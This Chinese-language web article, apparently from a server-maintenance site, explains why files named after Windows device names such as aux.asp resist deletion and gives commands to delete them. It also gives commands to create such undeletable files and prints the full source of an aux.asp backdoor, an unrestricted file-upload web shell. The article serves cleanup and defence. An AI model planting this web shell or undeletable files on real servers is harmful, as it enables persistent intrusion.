- Rongsen.Com.Cn 版权所有 2008-2010 京ICP备08007000号 京公海网安备11010802026356号 朝阳网安编号:110105199号
- 北京黑客防线网安工作室-黑客防线网安服务器维护基地为您提供专业的
服务器维护
,企业网站维护
,网站维护
服务 - (建议采用1024×768分辨率,以达到最佳视觉效果) Powered by 黑客防线网安 ©2009-2010 www.rongsen.com.cn
删除.asp等无法删除文件解析大法
作者:黑客防线网安网站设计小组 来源:黑客防线网安网站建设教程网 浏览次数:0本篇关键词:删除文件
|
黑客防线网安网讯:近期有朋友发现自己的网站目录下多出许多类似 aux.asp com1.gupiao.asp 的文件或文件夹,无法删除!这类文件为何无法删除,怎样建立无法删除的文件,又如何删除 aux.asp 这类‘无法删除的文件’呢?
近期有朋友发现自己的网站目录下多出许多类似 aux.asp com1.gupiao.asp 的文件或文件夹,无法删除!这类文件为何无法删除,怎样建立无法删除的文件,又如何删除 aux.asp 这类‘无法删除的文件’呢?
在服务器中 文件夹选项 – 查看 -隐藏受保护的操作系统文件[取消勾选]后可看到此类文件属性均为RHSA系统文件,无法删除、修改、移动。
Windows 下不能够以下面这些字样来命名文件/文件夹,包括:aux、com1、com2、prn、con、nul 等,因为这些名字都属于设备名称,等价于一个 DOS 设备,如果我们把文件命名为这些名字,Windows 就会误以为发生重名,所以会提示“不能创建同名的文件”。
要建立这类无法删除文件的方法也很简单:
copy 123.txt \.d:aux.asp
建立不可删除的文件夹:
md \.d:prn\
要删除这类‘无法删除的文件’也是有办法的,如:d:wwwrootwebwww 是包含这些无法删除文件的目录。在执行命令前,把文件夹中需要备份的程序先移动到其他位置,然后使用以下命令可以删除。
rmdir \.d:wwwrootwebwww /s /q
也可以使用下面的命令直接删除这些文件:
del \.d:wwwrootwebwwwaux.asp
其它删除方法如下:
第一步:进入服务器,打开工具>文件夹选项>查看>”隐藏受保护的操作系统文件(推荐)”,去掉其前边的钩,选中”显示所有文件和文件夹” 。
看木马文件的创建时间,通过搜索找出与其同时创建的文件。
第二步:下载Unlocker或者暴力删除文件工具,将这些文件删除,这个两个工具我测试都可以删除的
最简单也是最方便的,通过命令删除:
del /f /a /q \?%1
rd /s /q \?%1把上面的命令保存为.bat后缀名称的文件,然后把不能删除的文件或者文件夹拖到bat文件上就可以
另请注意修补网站漏洞,一般为后门为 aux.asp;aux.jpg 上传漏洞。
附上aux.asp源码:
< %
Dim oUpFileStream
Class UpFile_Class
Dim Form,File,Version,Err
Private Sub Class_Initialize
Version = "Version V1.0"
Err = -1
End Sub
Private Sub Class_Terminate
'清除变量及对像
If Err < 0 Then
Form.RemoveAll
Set Form = Nothing
File.RemoveAll
Set File = Nothing
oUpFileStream.Close
Set oUpFileStream = Nothing
End If
End Sub
Public Sub GetDate (RetSize)
'定义变量
Dim RequestBinDate,sSpace,bCrLf,sInfo,iInfoStart,iInfoEnd,tStream,iStart,oFileInfo
Dim iFileSize,sFilePath,sFileType,sFormValue,sFileName
Dim iFindStart,iFindEnd
Dim iFormStart,iFormEnd,sFormName
'代码开始
If Request.TotalBytes < 1 Then
Err = 1
Exit Sub
End If
If RetSize > 0 Then
If Request.TotalBytes > RetSize Then
Err = 2
Exit Sub
End If
End If
Set Form = Server.CreateObject ("Scripting.Dictionary")
Form.CompareMode = 1
Set File = Server.CreateObject ("Scripting.Dictionary")
File.CompareMode = 1
Set tStream = Server.CreateObject ("ADODB.Stream")
Set oUpFileStream = Server.CreateObject ("ADODB.Stream")
oUpFileStream.Type = 1
oUpFileStream.Mode = 3
oUpFileStream.Open
oUpFileStream.Write Request.BinaryRead (Request.TotalBytes)
oUpFileStream.Position = 0
RequestBinDate = oUpFileStream.Read
iFormEnd = oUpFileStream.Size
bCrLf = ChrB (13) & ChrB (10)
'取得每个项目之间的分隔符
sSpace = MidB (RequestBinDate,1, InStrB (1,RequestBinDate,bCrLf)-1)
iStart = LenB (sSpace)
iFormStart = iStart+2
'分解项目
Do
iInfoEnd = InStrB (iFormStart,RequestBinDate,bCrLf & bCrLf)+3
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iFormStart
oUpFileStream.CopyTo tStream,iInfoEnd-iFormStart
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sInfo = tStream.ReadText
'取得表单项目名称
iFormStart = InStrB (iInfoEnd,RequestBinDate,sSpace)-1
iFindStart = InStr (22,sInfo,"name=""",1)+6
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFormName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
'如果是文件
If InStr (45,sInfo,"filename=""",1) > 0 Then
Set oFileInfo = new FileInfo_Class
'取得文件属性
iFindStart = InStr (iFindEnd,sInfo,"filename=""",1)+10
iFindEnd = InStr (iFindStart,sInfo,"""",1)
sFileName = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileName = Mid (sFileName,InStrRev (sFileName, "\")+1)
oFileInfo.FilePath = Left (sFileName,InStrRev (sFileName, "\")+1)
oFileInfo.FileExt = Mid (sFileName,InStrRev (sFileName, ".")+1)
iFindStart = InStr (iFindEnd,sInfo,"Content-Type: ",1)+14
iFindEnd = InStr (iFindStart,sInfo,vbCr)
oFileInfo.FileType = Mid (sinfo,iFindStart,iFindEnd-iFindStart)
oFileInfo.FileStart = iInfoEnd
oFileInfo.FileSize = iFormStart -iInfoEnd -2
oFileInfo.FormName = sFormName
file.add sFormName,oFileInfo
else
'如果是表单项目
tStream.Close
tStream.Type = 1
tStream.Mode = 3
tStream.Open
oUpFileStream.Position = iInfoEnd
oUpFileStream.CopyTo tStream,iFormStart-iInfoEnd-2
tStream.Position = 0
tStream.Type = 2
tStream.CharSet = "gb2312"
sFormValue = tStream.ReadText
If Form.Exists (sFormName) Then
Form (sFormName) = Form (sFormName) & ", " & sFormValue
else
form.Add sFormName,sFormValue
End If
End If
tStream.Close
iFormStart = iFormStart+iStart+2
'如果到文件尾了就退出
Loop Until (iFormStart+2) = iFormEnd
RequestBinDate = ""
Set tStream = Nothing
End Sub
End Class
'文件属性类
Class FileInfo_Class
Dim FormName,FileName,FilePath,FileSize,FileType,FileStart,FileExt
'保存文件方法
Public Function SaveToFile (Path)
On Error Resume Next
Dim oFileStream
Set oFileStream = CreateObject ("ADODB.Stream")
oFileStream.Type = 1
oFileStream.Mode = 3
oFileStream.Open
oUpFileStream.Position = FileStart
oUpFileStream.CopyTo oFileStream,FileSize
oFileStream.SaveToFile Path,2
oFileStream.Close
Set oFileStream = Nothing
End Function
'取得文件数据
Public Function FileDate
oUpFileStream.Position = FileStart
FileDate = oUpFileStream.Read (FileSize)
End Function
End Class
%>
<html>
<head>
<title>文件上传</title>
< %
Server.ScriptTimeOut=999999'要是你的上传的文件比较大,就必须设置。
'定义变量
dim Forumupload,ranNum
dim formName,formPath,filename,file_name,fileExt,Filesize,F_Type
dim dateupnum
dim rename
dim previewpath,F_Viewname
F_Viewname=""
previewpath="PreviewImage/"
'===========================无组件上传============================
if request("up")=123 then
Server.ScriptTimeOut=10000
dim upload,file
set upload=new UpFile_Class ''建立上传对象
upload.GetDate (10000000*1024) '取得上传数据,不限大小
formPath=upload.form("filepath")
'在目录后加(/)
if right(formPath,1)<>"/" then formPath=formPath&"/"
for each formName in upload.file ''列出所有上传了的文件
set file=upload.file(formName) ''生成一个文件对象
fileExt=lcase(file.FileExt) ''文件类型
'付值变量
randomize
ranNum=int(90000*rnd)+10000
'file_name=lcase(file.filename)
'filename=file_name&"."&fileExt
filename=lcase(file.filename)
rename=filename&"│"
filename=formPath&filename
Filesize=file.FileSize
'记录文件
if Filesize>0 then '如果 FileSize > 0 说明有文件数据
file.SaveToFile Server.mappath(FileName) ''执行上传文件
end if
set file=nothing
next
'===========================无组件上传完============================
end if
%>
</head>
<body>
<form name="form" method="post" action="<%=url%>?up=123" enctype="multipart/form-data">
<table width="100%" border=0 cellspacing=0 cellpadding=0>
<tr><td class=tablebody2 valign=top height=30>
传至服务器已有虚拟目录:
<input type="text" name="filepath" value="/" size="15"/>
本地文件:
<input type="hidden" name="act" value="upload"/>
<input type="hidden" name="fname"/>
<input type="file" name="file1"/>
<input type="submit" name="Submit" value="上传" onclick="fname.value=file1.value"/>
</td></tr>
</table>
</form>
</body>
</html> 黑客防线网安服务器维护方案本篇连接:http://www.rongsen.com.cn/show-19642-1.html
新闻栏目
| 我要申请本站:N点 | 黑客防线官网 | |
| 专业服务器维护及网站维护手工安全搭建环境,网站安全加固服务。黑客防线网安服务器维护基地招商进行中!QQ:29769479 |